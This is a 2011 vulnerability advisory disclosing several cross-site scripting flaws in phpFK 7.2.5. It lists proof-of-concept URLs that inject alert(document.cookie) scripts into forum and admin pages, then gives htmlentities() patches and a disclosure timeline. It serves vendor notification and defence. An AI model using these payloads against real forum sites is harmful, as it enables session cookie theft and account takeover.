Advisory:              	phpFK 7.2.5 Multiple Cross-site Scripting Vulnerabilities
Advisory ID:           	SSCHADV2011-022
Author:                	Stefan Schurtz
Affected Software:  	Successfully tested on phpFK 7.2.5
Vendor URL:          	http://www.frank-karau.de/
Vendor Status:       	informed
CVE-ID:                	-

==========================
Vulnerability Description:
==========================

phpFK 7.2.5 is prone to multiple Cross-site scripting vulernabilities

==================
Technical Details:
==================

http://<target>/phpfk_php_forum_7.2.5/faq.php?'"/><script>alert(document.cookie)</script>
http://<target>/phpfk_php_forum_7.2.5/ranking.php?'"/><script>alert(document.cookie)</script>
http://<target>/phpfk_php_forum_7.2.5/search.php?'"/><script>alert(document.cookie)</script>
http://<target>/phpfk_php_forum_7.2.5/ranking.php?sort=0&page=1'"/><script>alert(document.cookie)</script>
http://<target>/phpfk_php_forum_7.2.5/user.php?user='"/><script>alert(document.cookie)</script>
http://<target>/phpfk/ranking.php?sort=1&page=1."</script><script>alert(document.cookie)</script>
 
Backend
 
http://<target>/phpfk/ap/?nav=user&page=groups_edit&group=.</style></script><script>alert(document.cookie)</script>

=========
Solution:
=========

ranking.php

- <td class="oben"><a href="ranking.php?sort=0&page='.$_GET['page'].'">'.$_TEXT['LOGIN_USERNAME'].'</a></td>
+ <td class="oben"><a href="ranking.php?sort=0&page='.htmlentities($_GET['page']).'">'.$_TEXT['LOGIN_USERNAME'].'</a></td>

- <td class="oben"><a href="ranking.php?sort=1&page='.$_GET['page'].'">'.$_TEXT['POINTS'].'</a></td>
+ <td class="oben"><a href="ranking.php?sort=1&page='.htmlentities($_GET['page']).'">'.$_TEXT['POINTS'].'</a></td>

- <td class="oben"><a href="ranking.php?sort=2&page='.$_GET['page'].'">'.$_TEXT['TIME_OF_REGISTRATION'].'</a></td>
+ <td class="oben"><a href="ranking.php?sort=2&page='.htmlentities($_GET['page']).'">'.$_TEXT['TIME_OF_REGISTRATION'].'</a></td>

- <td class="oben"><a href="ranking.php?sort=3&page='.$_GET['page'].'">'.$_TEXT['TIME_OF_LAST_VISIT'].'</a></td>
+ <td class="oben"><a href="ranking.php?sort=3&page='.htmlentities($_GET['page']).'">'.$_TEXT['TIME_OF_LAST_VISIT'].'</a></td>

/include/page_top.php

- <form action="'.$url.'" name="login" method="post">
+ <form action="'.htmlentities($url).'" name="login" method="post">

====================
Disclosure Timeline:
====================

02-Oct-2011 - informed developers
04-Oct-2011 - release date of this security advisory

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.frank-karau.de/
http://www.rul3z.de/advisories/SSCHADV2011-022.txt